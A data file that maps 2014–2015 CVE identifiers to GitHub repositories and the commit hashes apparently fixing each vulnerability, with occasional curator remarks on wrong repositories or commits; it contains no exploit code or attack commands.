-CVE-2014-1604;https://github.com/alex/rply;None:None;False;fc9bbcd25b0b4f09bbd6339f710ad24c129d5d7c; -CVE-2014-1829;https://github.com/psf/requests;None:None;False;f1893c835570d72823c970fbd6e0e42c13b1f0f2,7ba5a534ae9fc24e40b3ae6c480c9075d684727e,d9f34c6848b9b313beefa7d3ce05f52fdea28c27,326a22e8880c1dba52698a479eb7b6038d5b2e87; -CVE-2014-1830;https://github.com/psf/requests;None:None;False;f1893c835570d72823c970fbd6e0e42c13b1f0f2,7ba5a534ae9fc24e40b3ae6c480c9075d684727e,d9f34c6848b9b313beefa7d3ce05f52fdea28c27,326a22e8880c1dba52698a479eb7b6038d5b2e87,4d8cb3244e8e4f84b250c10a48e025f9a8bf6137; -CVE-2014-1832;https://github.com/phusion/passenger;None:None;False;94428057c602da3d6d34ef75c78091066ecac5c0,34b1087870c2bf85ebfd72c30b78577e10ab9744; -CVE-2014-1858;https://github.com/numpy/numpy;None:None;False;c7a30d538ba4c984d6f97b613486a3738b2c7922,961c43da78bf97ce63183b27c338db7ea77bed85,0bb46c1448b0d3f5453d5182a17ea7ac5854ee15; -CVE-2014-1859;https://github.com/numpy/numpy;None:None;False;961c43da78bf97ce63183b27c338db7ea77bed85,c7a30d538ba4c984d6f97b613486a3738b2c7922,0bb46c1448b0d3f5453d5182a17ea7ac5854ee15; -CVE-2014-1869;https://github.com/zeroclipboard/zeroclipboard;None:None;False;2f9eb9750a433965572d047e24b0fc78fd1415ca,eebdfa425ca2525f3b363cdc9e50bcfbcc35a2e6; -CVE-2014-1904;https://github.com/spring-projects/spring-framework;None:None;False;741b4b229ae032bd17175b46f98673ce0bd2d485; -CVE-2014-1932;https://github.com/python-pillow/Pillow;None:None;False;4e9f367dfd3f04c8f5d23f7f759ec12782e10ee7,e9fe13da153be962e283937547a78c78f6ca81ff,1e331e3e6a40141ca8eee4f5da9f74e895423b66,844ed441deb6b75d3048fa111977188ed47f0b76,86d5c5c3894f58895f31287081cdd146f5fe00f7; -CVE-2014-1933;https://github.com/python-pillow/Pillow;None:None;False;1e331e3e6a40141ca8eee4f5da9f74e895423b66,4e9f367dfd3f04c8f5d23f7f759ec12782e10ee7,e9fe13da153be962e283937547a78c78f6ca81ff,844ed441deb6b75d3048fa111977188ed47f0b76,86d5c5c3894f58895f31287081cdd146f5fe00f7; -CVE-2014-2053;https://github.com/JamesHeinrich/getID3;None:None;False;afbdaa044a9a0a9dff2f800bd670e231b3ec99b2,dc8549079a24bb0619b6124ef2df767704f8d0bc; -CVE-2014-2235;https://github.com/ASKBOT/askbot-devel;None:None;False;a676a86b6b7a5737d4da4f59f71e037406f88d29,876e3662ff6b78cc6241338c15e3a0cb49edf4e2; -CVE-2014-2525;https://github.com/yaml/libyaml;None:None;False;d1003a9d40b674520934f4f38ffc4ff2a809bc2d; -CVE-2014-2538;https://github.com/chopmo/rack-ssl;None:None;False;d99a9b403eb0cc7acbfa380daa501186e370583f,9d7d7300b907e496db68d89d07fbc2e0df0b487b,94041c3e68bdca772715a353295dd53e42cf5ed0,7445c16f989d2e434235c2df4f6d99ebff10897d; wrong repo old (changed probably) -CVE-2014-3007;https://github.com/python-pillow/Pillow;None:None;False;1e331e3e6a40141ca8eee4f5da9f74e895423b66,4e9f367dfd3f04c8f5d23f7f759ec12782e10ee7; is pillow 2.3:2.4 -CVE-2014-3120;https://github.com/elastic/elasticsearch;None:None;False;95bd04b2c7fd7387c7e3b3367361dcf9fe9f9d06; -CVE-2014-3250;https://github.com/puppetlabs/puppet;None:None;False;b02af7e05d9b9a3bc23474933d8d7f6cd6191158; -CVE-2014-3488;https://github.com/netty/netty;None:None;False;2fa9400a59d0563a66908aba55c41e7285a04994; -CVE-2014-3505;https://github.com/openssl/openssl;None:None;False;bff1ce4e6a1c57c3d0a5f9e4f85ba6385fccfe8b,1b7024fb69161619855d86b80ae0681ea802e245,84361b898d456220039bc8b292f7b0ba70224a26,2172d4f63c61922487008f42511cc6bdae9b47a0,49850075555893c9c60d5b981deb697f3b9515ea; -CVE-2014-3506;https://github.com/openssl/openssl;None:None;False;1250f12613b61758675848f6600ebd914ccd7636,338a5e7e5458edf4cf754fd831a451fb4b57d180,934ca0714a686673695c055de86064f423984477,fc7804ec392fcf8051abe6bc9da9108744d2ae35,0598468fc04fb0cf2438c4ee635b587aac1bcce6; -CVE-2014-3509;https://github.com/openssl/openssl;None:None;False;fb0bc2b273bcc2d5401dd883fe869af4fc74bb21,03a12c1330575398cbdbd301b923af65bb7f4466,86788e1ee6908a5b3a4c95fa80caa4b724a8a434,92aa73bcbfad44f9dd7997ae51537ac5d7dc201e; -CVE-2014-3511;https://github.com/openssl/openssl;None:None;False;280b1f1ad12131defcd986676a8fc9717aaa601b,fc4bd2f287582c5f51f9549727fd5a49e9fc3012,67e53f73bf44ba354bac0fab1b38c6c596b49fc6,fc4f4cdb8bf9981904e652abf69b892a45bddacf,40a2200d89b2a559700cee95f1898312f993792a; -CVE-2014-3572;https://github.com/openssl/openssl;None:None;False;b15f8769644b00ef7283521593360b7b2135cb63,e42a2abadc90664e2615dc63ba7f79cf163f780a,ef28c6d6767a6a30df5add36171894c96628fe98,802a070bb6452dd9df49e550e0f3b16777e5232b,4aaf1e493cb86efa64f6a486a27d38da6bce23af; -CVE-2014-3576;https://github.com/apache/activemq;None:None;False;00921f22ff9a8792d7663ef8fadd4823402a6324; -CVE-2014-3577;https://github.com/apache/httpcomponents-client;None:None;False;51cc67567765d67f878f0dcef61b5ded454d3122; -CVE-2014-3578;https://github.com/spring-projects/spring-framework;None:None;False;8ee465103850a3dca018273fe5952e40d5c45a66,748167bfa33c3c69db2d8dbdc3a0e9da692da3a0,f6fddeb6eb7da625fd711ab371ff16512f431e8d; -CVE-2014-3579;https://github.com/apache/activemq-apollo;None:None;False;e5647554e6801a522c508a8eb457979a9af8c398; -CVE-2014-3599;https://github.com/hornetq/hornetq;None:None;False;b3a63576371828d5f8e64ba7ccbcecb1da8111d2; -CVE-2014-3600;https://github.com/apache/activemq;None:None;False;b9696ac80bb496b52d05c3884f81b0746d9af9e2,3e5ac6326db59f524a0e71f6b717428607d7b67d; -CVE-2014-3612;https://github.com/apache/activemq;None:None;False;22f2f3dde757d31307da772d579815c1d169bc39; -CVE-2014-3625;https://github.com/spring-projects/spring-framework;None:None;False;3f68cd633f03370d33c2603a6496e81273782601,9cef8e3001ddd61c734281a7556efd84b6cc2755,9beae9ae4226c45cd428035dae81214439324676; -CVE-2014-3630;https://github.com/playframework/playframework;None:None;False;656ee5a56bd7b2c7821d8dcb437688ae1deab1b7,97f9ddbb13d8f373e8088f4bb41cb2ccd6df9de7,b226583403179d815e8ae7e76c381b22a9a7c2e0; -CVE-2014-3709;https://github.com/keycloak/keycloak;None:None;False;bb132e1aa0b3b3a123883d0b8d0b788337df956d; -CVE-2014-3741;https://github.com/tojocky/node-printer;None:None;False;e001e38738c17219a1d9dd8c31f7d82b9c0013c7; -CVE-2014-3994;https://github.com/djblets/djblets;None:None;False;77a68c03cd619a0996f3f37337b8c39ca6643d6e,d3e428a6f7bc4c04d100b06e663c071fdc1717d9; -CVE-2014-3995;https://github.com/djblets/djblets;None:None;False;77ac64642ad530bf69e390c51fc6fdcb8914c8e7; -CVE-2014-4172;https://github.com/apereo/java-cas-client;None:None;False;ab6cbdc3daa451b4fef89c0bd0f4e6568f3aa9ef,9de2be91a2ed4f013900cb1facd4036c2f34d051,ae37092100c8eaec610dab6d83e5e05a8ee58814; -CVE-2014-4657;https://github.com/ansible/ansible;None:None;False;998793fd0ab55705d57527a38cee5e83f535974c; -CVE-2014-4658;https://github.com/ansible/ansible;None:None;False;a0e027fe362fbc209dbeff2f72d6e95f39885c69,75e0b7a5cf805217a9365b995c5b99ed12aea5af; -CVE-2014-4678;https://github.com/ansible/ansible;None:None;False;5429b85b9f6c2e640074176f36ff05fd5e4d1916,b8b96b210915789745ece8ad04f1c1bfc1c72030; -CVE-2014-5277;https://github.com/docker/docker-py;None:None;False;537b4681403cd9dd29b753584e6c8317edf7ae3f; -CVE-2014-6394;https://github.com/pillarjs/send;None:None;False;9c6ca9b2c0b880afd3ff91ce0d211213c5fa5f9a; -CVE-2014-7143;https://github.com/twisted/twisted;None:None;False;3b5942252f5f3e45862a0e12b266ab29e243cc33; 15.0.0 did not include the commit -CVE-2014-7189;https://github.com/golang/go;None:None;False;247820ff6bfba6e1b7891f4bfc25511d68761d5d; -CVE-2014-7192;https://github.com/browserify/syntax-error;None:None;False;9aa4e66eb90ec595d2dba55e6f9c2dd9a668b309; -CVE-2014-7193;https://github.com/hapijs/crumb;None:None;False;5e6d4f5c81677fe9e362837ffd4a02394303db3c; -CVE-2014-7202;https://github.com/zeromq/libzmq;None:None;False;fe4396c597929382214c7966e60f025114d4f32d,77f14aad95cdf0d2a244ae9b4a025e5ba0adf01a; -CVE-2014-7203;https://github.com/zeromq/libzmq;None:None;False;e40d4b23762502c2de9bc2bc4817dfe2f33b8ed9,0900a489213d74feb86fc0b343308fe7884a2a3c; -CVE-2014-7205;https://github.com/outmoded/bassmaster;None:None;False;bece966a3106ee6a5506efc2f9bc32c379f54aa1,b751602d8cb7194ee62a61e085069679525138c4; -CVE-2014-7809;https://github.com/apache/struts;None:None;False;1f301038a751bf16e525607c3db513db835b2999; -CVE-2014-8115;https://github.com/kiegroup/kie-wb-distributions;None:None;False;90eed433d36b21265fdf978252b8619766b8e74b; -CVE-2014-8152;https://github.com/apache/santuario-xml-security-java;None:None;False;3d7086c603a4538933dfa98d697d0df4539a984f; -CVE-2014-8176;https://github.com/openssl/openssl;None:None;False;d52eb82781eff1f8245ae9c16c84db765f037cbe,470990fee0182566d439ef7e82d1abf18b7085d7,bcc311668ede6ffdcd6dc5a65454a548b5404fcc,b79e6e3a276634582012d531f4150a5fcf84fab3,4b258e73ae0da0f1a7ff3eb9840b6978711c2400; -CVE-2014-8547;https://github.com/FFmpeg/FFmpeg;None:None;False;8f1457864be8fb9653643519dea1c6492f1dde57,9ae3cd6e7271a3d6b8cd92a4d35ebb16d2e03f1a,02de44073a8e116ea177b53081219d32ef135ad8,0b39ac6f54505a538c21fe49a626de94c518c903,7f90eef87ac84c617b102b689eb68e7cb140167b; -CVE-2014-8548;https://github.com/FFmpeg/FFmpeg;None:None;False;c727401aa9d62335e89d118a5b4e202edf39d905,a331e11906b196c9a00f5ffbc45d80fcd7fe8423,306ee95088243fefa2dfcb5c355d439db75e2d2a,f249e9889155599ee3ad0172832d38f68b0c625d,d423dd72be451462c6fb1cbbe313bed0194001ab,c0c24bc9b32419c7883a344c74a6779374a3c16a; -CVE-2014-8549;https://github.com/FFmpeg/FFmpeg;None:None;False;550f3e9df3410b3dd975e590042c0d83e20a8da3,cee4490b521fd0d02476d46aa2598af24fb8d686,84d26ab6eb07e22ad6ffcd8109ca1d1a0cd57bce; -CVE-2014-8650;https://github.com/requests/requests-kerberos;None:None;False;208bebb7008796a07be0204d9b5beaa55d2373ae,9c1e08cc17bb6950455a85d33d391ecd2bce6eb6; -CVE-2014-8681;https://github.com/gogs/gogs;None:None;False;83283bca4cb4e0f4ec48a28af680f0d88db3d2c8; -CVE-2014-8682;https://github.com/gogs/gogs;None:None;False;0c5ba4573aecc9eaed669e9431a70a5d9f184b8d; -CVE-2014-8991;https://github.com/pypa/pip;None:None;False;043fe9f5700315d97f83609c1f59deece8f1b901,01610be0d58bc428646126090cb2905cf219b2f4; -CVE-2014-9130;https://github.com/yaml/libyaml;None:None;False;e6aa721cc0e5a48f408c52355559fd36780ba32a; -CVE-2014-9489;https://github.com/gollum/grit_adapter;None:None;False;4520d973c81fecfebbeacd2ef2f1849d763951c7; -CVE-2014-9682;https://github.com/skoranga/node-dns-sync;None:None;False;d9abaae384b198db1095735ad9c1c73d7b890a0d; -CVE-2014-9720;https://github.com/tornadoweb/tornado;None:None;False;c2a8c322b3f3f54f6525d7469ecab1af46862bc2,1c36307463b1e8affae100bf9386948e6c1b2308,7279a303d1c366aabd4facfc6b29ed46c3422350; -CVE-2014-9721;https://github.com/zeromq/zeromq4-x;None:None;False;b6e3e0f601e2c1ec1f3aac880ed6a3fe63043e51; -CVE-2014-9970;https://github.com/jboss-fuse/jasypt;None:None;False;8e62852a8018978ee19d39056c650fb66ffa0ff6; -CVE-2014-10068;https://github.com/hapijs/inert;None:None;False;48a7fab2f36016893a05bf29b8ac70d21feb495e,f1c70be886c968e9786ab7feae721132fabed448,e8f99f94da4cb08e8032eda984761c3f111e3e82,08931fcef7e67b3f6aac7b207eafa31d3754f1ef; -CVE-2014-10077;https://github.com/ruby-i18n/i18n;None:None;False;9c8b24031abe12d9024e69eccda76ea8061976ba,24e71a9a4901ed18c9cab5c53109fd9bf2416bcb; -CVE-2015-0204;https://github.com/openssl/openssl;None:None;False;ce325c60c74b0fa784f5872404b722e120e5cab0,37580f43b5a39f5f4e920d17273fab9713d3a744,08a88774bd8463bedf7fe440a165d3d98b702361,72f181539118828ca966a0f8d03f6428e2bcf0d6,4b4c1fcc88aec8c9e001b0a0077d3cd4de1ed0e6; -CVE-2015-0205;https://github.com/openssl/openssl;None:None;False;1421e0c584ae9120ca1b88098f13d6d2e90b83a3,a4aa18879917d9bd45f52ac110c69303a852b7db,f7fe3d235abf201343c20a59f9d9c8957acc62ff,be3fb8d15dd5a233eab0c454677d538e64d17f82,98a0f9660d374f58f79ee0efcc8c1672a805e8e8; -CVE-2015-0206;https://github.com/openssl/openssl;None:None;False;b095884a58876ccd3e65f620b7f80d61b4bce687,7c6a3cf2375f5881ef3f3a58ac0fbd0b4663abd1,103b171d8fc282ef435f8de9afbf7782e312961f,04685bc949e90a877656cf5020b6d4f90a9636a6; -CVE-2015-0208;https://github.com/openssl/openssl;None:None;False;4b22cce3812052fe64fc3f6d58d8cc884e3cb834,09f06923e636019c39c807cb59c481375e720556; -CVE-2015-0209;https://github.com/openssl/openssl;None:None;False;5e5d53d341fd9a9b9cc0a58eb3690832ca7a511f,9e442d485008046933cdc7da65080f436a4af089,c380bff888bfd5e48c4b24250ba1996b0fd1a5e3,dfc3e9698b755e179e8ae8e3cef7ff4e07cfd500,dac693c957dc40dbf839f0add91b824deba26dc3,a4517be9e348634ac64f9cf093131e13e8c03e38,89117535f1bb3ea72a17933b703271587d7aaf0b,ba5d0113e8bcb26857ae58a11b219aeb7bc2408a,1b4a8df38fc9ab3c089ca5765075ee53ec5bd66a,18029a3d0739284cadb309ea0fd498379b0bcfdb; -CVE-2015-0250;https://github.com/apache/xmlgraphics-batik;None:None;False;efebce3f0ad33ede916a148b84d75749aea38349; -CVE-2015-0276;https://github.com/zhumengyuan/kallithea;None:None;False;68183cc8e48e4e4fee8510ee819f903b3af3a01b; -CVE-2015-0286;https://github.com/openssl/openssl;None:None;False;e677e8d13595f7b3287f8feef7676feb301b0e8a,c3c7fb07dc975dc3c9de0eddb7d8fd79fc9c67c1,02758836731658381580e282ff403ba07d87b2f8,497d0b00dca876beb6c81f2ea6d7160897434c2e,c982285ab63adeb473197d54d246d120bf60778b; identified more twins -CVE-2015-0287;https://github.com/openssl/openssl;None:None;False;8106d61c354430d6bbbd7f8e7840a39efc0f5829,b717b083073b6cacc0a5e2397b661678aff7ae7f,7746ff501c65968203f376e46bd1eeb93efb0f64,674341f1b0548e36a6cc49917334f5cbd09aaa2c,b485d976340d3ca080060c3c7dee9102e2200762; -CVE-2015-0288;https://github.com/openssl/openssl;None:None;False;28a00bcd8e318da18031b2ac8778c64147cd54f9,241cff623e2b0f7c435a3a80ae783c29d994f061,4bf7b291692c59270ddca0e62de1f11611591cfc,51527f1e3564f210e984fe5b654c45d34e4f03d7,9fdbaf3a322689a58381c724e4f3497320a69581; -CVE-2015-0289;https://github.com/openssl/openssl;None:None;False;c0334c2c92dd1bc3ad8138ba6e74006c3631b0f9,544e3e3b69d080ee87721bd03c37b4d450384fb9,c225c3cf9bd67297fb0c297768d69cbc03fbdab7; -CVE-2015-0290;https://github.com/openssl/openssl;None:None;False;1d2a18dc5a3b3363e17db5af8b6b0273856ac077,77c77f0a1b9f15b869ca3342186dfbedd1119d0e; -CVE-2015-0292;https://github.com/openssl/openssl;None:None;False;fce3821111e3307a599d2378f2cca2ef2097c6c4,d0666f289ac013094bbbf547bfbcd616199b7d2d,9febee02720902c195fe929ecfe06362c551422c,84fe686173d519dfee5d264272beab666508fc57; -CVE-2015-0293;https://github.com/openssl/openssl;None:None;False;86f8fb0e344d62454f8daf3e15236b2b59210756,5cc6509dae697f0e74aaba73e1635f269a9c5e61; vulnerable tag is fixed -CVE-2015-0838;https://github.com/dulwich/dulwich;None:None;False;b25e8390074060ea2aed25cf070b8e98b85a3875; -CVE-2015-0846;https://github.com/jamesturk/django-markupfield;None:None;False;b45734ea1d206abc1ed2a90bdc779708066d49f3; -CVE-2015-1169;https://github.com/apereo/cas;None:None;False;8d22bfcb328a1948f40d29e11bdddc572e8d1363,1a8c5e98b81c649ce06a6a6ac8c5a6a9abddce73; -CVE-2015-1208;https://github.com/FFmpeg/FFmpeg;None:None;False;3ebd76a9c57558e284e94da367dd23b435e6a6d0,54b76eb5951502d24618c335d0bb275f70d31f3c; -CVE-2015-1326;https://github.com/martinpitt/python-dbusmock;None:None;False;4e7d0df909338eb3c44b083722c7bf8b76bdf940; -CVE-2015-1772;https://github.com/apache/hive;None:None;False;6929846a8120eaf094b914b4ca8af80b65f891c8; 1.1.1 did not contain it -CVE-2015-1782;https://github.com/libssh2/libssh2;None:None;False;7d94b69b802c03e8d7726f4ae61baba52cb7d871; -CVE-2015-1788;https://github.com/openssl/openssl;None:None;False;4924b37ee01f71ae19c94a8934b80eeb2f677932,40b8eb792d591d19751afc4d056c8e84260bdeb8,f61bbf8da532038ed0eae16a9a11771f3da22d30; -CVE-2015-1789;https://github.com/openssl/openssl;None:None;False;9bc3665ac9e3c36f7762acd3691e1115d250b030,57de3216e27c2e52bc3bc5bc7c94babdb7022179,f48b83b4fb7d6689584cf25f61ca63a4891f5b11,fa57f74a3941db6b2efb2f43c6add914ec83db20,370ac320301e28bb615cee80124c042649c95d14; -CVE-2015-1791;https://github.com/openssl/openssl;None:None;False;708cf593587e2fda67dae9782991ff9fccc781eb,dcad51bc13c9b716d9a66248bcc4038c071ff158,27c76b9b8010b536687318739c6f631ce4194688,370ac320301e28bb615cee80124c042649c95d14,939b4960276b040fc0ed52232238fcc9e2e9ec21,98ece4eebfb6cd45cc8d550c6ac0022965071afc,39bcfb129e816de00bf2170c3497e8104767beb7,8b4fd12b0d1734d281994000752c771e8cd0a103,467daf6b6ef0753ccfc5c024c2f63c948354d698,db96b5ab761fb97633dde9aec62c0032743e88f8,9545eac45bc79496763d2ded02629f88a8629fb9,0ae3473e8578b547100389bd029873af0cd9a22e,907f04a30354615e54beaa2bc0b986083f7793ee,106a9a5d7e26e728a654d7424849081bd988d4a5,d44f89c990b4c9c41f77e9a0ffd5dc7c4ca07f84; -CVE-2015-1792;https://github.com/openssl/openssl;None:None;False;dd90a91d8771fd1ad5083fd46a2b3da16a587757,857b2ced04be897488df311a257f254ad8516429,aa5ab40860deb3dc6d4d4c98a4efea99f7040a46,92f9a8bf3844359bb50d86dab92bc24b074d350d; advisory links wrong commit -CVE-2015-1793;https://github.com/openssl/openssl;None:None;False;9a0db453ba017ebcaccbee933ee6511a9ae4d1c8,2aacec8f4a5ba1b365620a7b17fcce311ada93ad,21376d8ae310cf0455ca2b73c8e9f77cafeb28dd,cb22d2ae5a5b6069dbf66dbcce07223ac15a16de,b3b1eb5735c5b3d566a9fc3bf745bf716a29afa0,aae41f8c54257d9fa6904d3a9aa09c5db6cefd0d,692f07c3e0c04180b56febc2feb57cd94395a7a2; -CVE-2015-1830;https://github.com/apache/activemq;None:None;False;729c4731574ffffaf58ebefdbaeb3bd19ed1c7b7,9fd5cb7dfe0fcc431f99d5e14206e0090e72f36b; -CVE-2015-1838;https://github.com/saltstack/salt;None:None;False;e11298d7155e9982749483ca5538e46090caef9c; -CVE-2015-2068;https://github.com/dweeves/magmi-git;None:None;False;da400ea5772dd7427c2c1732a6a3a29363bbabdf,408320a2118f7474a482e968cd72c881bc712564; -CVE-2015-2156;https://github.com/netty/netty;None:None;False;97d871a7553a01384b43df855dccdda5205ae77a,d98b21be045a315ced88ada84000e4757cfb9892; -CVE-2015-2296;https://github.com/psf/requests;None:None;False;e776bb26560fe5e9fe7ae72719519e1d011b5d23,3bd8afbff29e50b38f889b2f688785a669b9aafc; -CVE-2015-2912;https://github.com/orientechnologies/orientdb;None:None;False;f11dbced94cb587f445cb99db08735c023921053,d5a45e608ba8764fd817c1bdd7cf966564e828e9,5dbd6035e4e59259f3e08ba8f1218785f36d1d2d; -CVE-2015-2913;https://github.com/orientechnologies/orientdb;None:None;False;7a5f61527343eae30ee0e5dfdcae60da412c69c3,668ece96be210e742a4e2820a3085b215cf55104; -CVE-2015-3010;https://github.com/ceph/ceph-deploy;None:None;False;eee56770393bf19ed2dd5389226c6190c08dee3f,3cdc6cb555173130d64ea6d90033a6e00cbde330; -CVE-2015-3192;https://github.com/spring-projects/spring-framework;None:None;False;d79ec68db40c381b8e205af52748ebd3163ee33b,9c3580d04e84d25a90ef4c249baee1b4e02df15e,5a711c05ec750f069235597173084c2ee7962424; -CVE-2015-3193;https://github.com/openssl/openssl;None:None;False;29851264f11ccc70c6c0140d7e3d8d93ef5c9b11,d73cc256c8e256c32ed959456101b73ba9842f72; -CVE-2015-3195;https://github.com/openssl/openssl;None:None;False;cf432b3b1bd7caa22943b41b94ec2472ae497dc6,cc598f321fbac9c04da5766243ed55d55948637d,b29ffa392e839d05171206523e84909146f7a77c,2cdafc51f008e65b2d5263a80ad0e89e9b56c8d3; -CVE-2015-3196;https://github.com/openssl/openssl;None:None;False;3c66a669dfc7b3792f7af0758ea26fe8502ce70c,d6be3124f22870f1888c532523b74ea5d89795eb,1392c238657ec745af6a40def03d67d4ce02a082; -CVE-2015-3197;https://github.com/openssl/openssl;None:None;False;d81a1600588b726c2bdccda7efad3cc7a87d6245,4040a7fd104b412bd446338c6c28a62eb7d8e852; -CVE-2015-3206;https://github.com/02strich/pykerberos;None:None;False;02d13860b25fab58e739f0e000bed0067b7c6f9c; -CVE-2015-3208;https://github.com/apache/activemq-artemis;None:None;False;48d9951d879e0c8cbb59d4b64ab59d53ef88310d; -CVE-2015-3220;https://github.com/trevp/tlslite;None:None;False;aca8d4f898b436ff6754e1a9ab96cae976c8a853; -CVE-2015-3253;https://github.com/apache/groovy;None:None;False;4a96e70f6315d3b28fc6f878e4d59dfba585a179,4df8b652aa018a5d5d1cda8fba938bf3422db31c,09e9778e8a33052d8c27105aee5310649637233d,716d3e67e744c7edeed7cbc3f874090d39355764; -CVE-2015-3395;https://github.com/FFmpeg/FFmpeg;None:None;False;f7e1367f58263593e6cee3c282f7277d7ee9d553,99a69249837079417ca8bec6dd0515ca996a748e,33877cd276f99fc234b5269d9d158ce71e50d363,539172c85b13796fe5ce2a7482f436b6e9b33cf6,48c7fe5b5834a197f10a6eb56cbe7cda8ee32407,a376ef4a17edb947bbcf54171daa914bd4585a4f,dfce316c12d867400fb132ff5094163e3d2634a3,70642090960c35dcd6da941c869bdf55d4f3bb00,5ecabd3c54b7c802522dc338838c9a4c2dc42948; -CVE-2015-3627;https://github.com/docker-archive/libcontainer;None:None;False;46132cebcf391b56842f5cf9b247d508c59bc625; -CVE-2015-3996;https://github.com/AFNetworking/AFNetworking;None:None;False;3e631b203dd95bb82dfbcc2c47a2d84b59d1eeb4; -CVE-2015-4053;https://github.com/ceph/ceph-deploy;None:None;False;9f9fd6e3372043bd2fd67582324c8fb5d7aa361e,6fc7f7f58b338fa920a6a570485836fe91b6de21,ab240e32061ba5f89fca3d145fa229e8c8284edd,628bd9ed6bfb84821ba7d2240cc41a8783cc4617,5368d9d14d3bfbef480d1302511121768d557d5e,8ef6d41e5bdbaf2717671c1ace237d35fa8ebcb4,f898b4cf44abc1f7fe472b59e009e6ff44e441a7; -CVE-2015-4082;https://github.com/jborg/attic;None:None;False;78f9ad1faba7193ca7f0acccbc13b1ff6ebf9072; -CVE-2015-4410;https://github.com/mongoid/moped;None:None;False;dd5a7c14b5d2e466f7875d079af71ad19774609b; wrong repository??? -CVE-2015-4412;https://github.com/mongodb/bson-ruby;None:None;False;976da329ff03ecdfca3030eb6efe3c85e6db9999; there is also a false positive (vulnerability introducing commit) -CVE-2015-4619;https://github.com/denkGroot/Spina;None:None;False;bfe44f289e336f80b6593032679300c493735e75; -CVE-2015-4706;https://github.com/ipython/ipython;None:None;False;6884e8b36dc1e2d59e1d8ddb5e95788728d76e6f,7222bd53ad089a65fd610fab4626f9d0ab47dfce,c2078a53543ed502efd968649fee1125e0eb549c; -CVE-2015-5081;https://github.com/django-cms/django-cms;None:None;False;f77cbc607d6e2a62e63287d37ad320109a2cc78a; -CVE-2015-5147;https://github.com/vmg/redcarpet;None:None;False;2cee777c1e5babe8a1e2683d31ea75cc4afe55fb; -CVE-2015-5159;https://github.com/latchset/kdcproxy;None:None;False;f274aa6787cb8b3ec1cc12c440a56665b7231882,5edbbeb7f950ed9db60b11f0fdce1ec96194f761; -CVE-2015-5207;https://github.com/apache/cordova-ios;None:None;False;a14e08eaa95211450f513c64d569d8c333dee4c5; commit outside the time interval -CVE-2015-5211;https://github.com/spring-projects/spring-framework;None:None;False;a95c3d820dbc4c3ae752f1b3ee22ee860b162402,03f547eb9868f48f44d59b56067d4ac4740672c3,2bd1daa75ee0b8ec33608ca6ab065ef3e1815543; -CVE-2015-5241;https://github.com/apache/juddi;None:None;False;018b5623cbf34b5810a1c6a7813d7d3c320bdbe0; -CVE-2015-5250;https://github.com/openshift/origin;None:None;False;dace5075e31b74703e944b6b3ebe8836be8d1b9a,5d021b0f3e0902b599fd8f528eb28a710aed223a,c55e4c7d12e15d83642b5872e620ecc5b35cb947; -CVE-2015-5253;https://github.com/apache/cxf;None:None;False;845eccb6484b43ba02875c71e824db23ae4f20c0,a61db289f87e448292f7ff0d0a3d25792dd4d42d,02245c656941f28b6b2be5e461e6db04a70d2436; -CVE-2015-5254;https://github.com/apache/activemq;None:None;False;e7a4b53f799685e337972dd36ba0253c04bcc01f,6f03921b31d9fefeddb0f4fa63150ed1f94a14b1,a7e2a44fe8d4435ae99532eb0ab852e6247f7b16,e100638244c4ca5eb2a1f16bcdc671c9859c2694; -CVE-2015-5305;https://github.com/kubernetes/kubernetes;None:None;False;8e07d2fc9312ed4f4fddd05d816b299754c1e967,63fb6c07a565fcb94df7778ad12f810ea1b3cdce,68f2add9bd5d43b9da1424d87d88f83d120e17d0,37f730f68c7f06e060f90714439bfb0dbb2df5e7; NVD does not contain versions at all -CVE-2015-5344;https://github.com/apache/camel;None:None;False;157c0b4a3c8017de432f1c99f83e374e97dc4d36,4cdc6b177ee7391eedc9f0b695c05d56f84b0812,b7afb3769a38b8e526f8046414d4a71430d77df0,369d0a6d605055cb843e7962b101e3bbcd113fec,8386d8f7260143802553bc6dbae2880d6c0bafda,4491c080cb6c8659fc05441e49307b7d4349aa56; -CVE-2015-5349;https://github.com/apache/directory-studio;None:None;False;ac57a26fcb98aa17fe9534575cf5fdad00a1c839; -CVE-2015-5607;https://github.com/ipython/ipython;None:None;False;1415a9710407e7c14900531813c15ba6165f0816,a05fe052a18810e92d9be8c1185952c13fe4e5b0; -CVE-2015-6524;https://github.com/apache/activemq;None:None;False;22f2f3dde757d31307da772d579815c1d169bc39; -CVE-2015-6584;https://github.com/DataTables/DataTablesSrc;None:None;False;ccf86dc5982bd8e16d11a0815c940f5b256874c9; -CVE-2015-6748;https://github.com/jhy/jsoup;None:None;False;4edb78991f8d0bf87dafde5e01ccd8922065c9b2,b86beca8feb26f9a3181e87fe36382f8ab4bdb98; -CVE-2015-6818;https://github.com/FFmpeg/FFmpeg;None:None;False;47f4e2d8960ca756ca153ab8e3e93d80449b8c91,e84d17c7c991f380622f6d2f25994dc6955d853c; -CVE-2015-6821;https://github.com/FFmpeg/FFmpeg;None:None;False;b160fc290cf49b516c5b6ee0730fd9da7fc623b1,88fa3243ddf320ce1d6691c6098e87263bd6d0ca; -CVE-2015-6822;https://github.com/FFmpeg/FFmpeg;None:None;False;39bbdebb1ed8eb9c9b0cd6db85afde6ba89d86e4,237751eb257fd528a91f35f0a835c2273957ee62; -CVE-2015-6823;https://github.com/FFmpeg/FFmpeg;None:None;False;f7068bf277a37479aecde2832208d820682b35e6,264eb0074f3b0591c9430b20927d6547c8757c48; -CVE-2015-6824;https://github.com/FFmpeg/FFmpeg;None:None;False;a5d44d5c220e12ca0cb7a4eceb0f74759cb13111,1cbd7b08f661163ea0f41f03752e420a47904c11; -CVE-2015-6826;https://github.com/FFmpeg/FFmpeg;None:None;False;3197c0aa87a3b7190e17d49e6fbc7b554e4b3f0a; -CVE-2015-6918;https://github.com/saltstack/salt;None:None;False;28aa9b105804ff433d8f663b2f9b804f2b75495a,528916548726976dcc75626dc6f6641ceb206ee3; -CVE-2015-7294;https://github.com/vesse/node-ldapauth-fork;None:None;False;3feea43e243698bcaeffa904a7324f4d96df60e4; -CVE-2015-7314;https://github.com/gollum/gollum;None:None;False;ce68a88293ce3b18c261312392ad33a88bb69ea1,de5aed2f6a6f9ad62cae05dc59d16fbfdd7a4543; -CVE-2015-7315;https://github.com/zopefoundation/Products.CMFCore;None:None;False;a4ff51ce26c50001db0f7856009771340e6ecda3,e1dc70a6198073f2ceedbe725a93cde57c7bfb34,13b83717b2c3a9fb2f0c16c436ec8d986f42b0e5,e1d981bfa14b664317285f0f36498f4be4a23406; -CVE-2015-7316;https://github.com/plone/Products.CMFPlone;None:None;False;3da710a2cd68587f0bf34f2e7ea1167d6eeee087,1845b0a92312291811b68907bf2aa0fb448c4016; 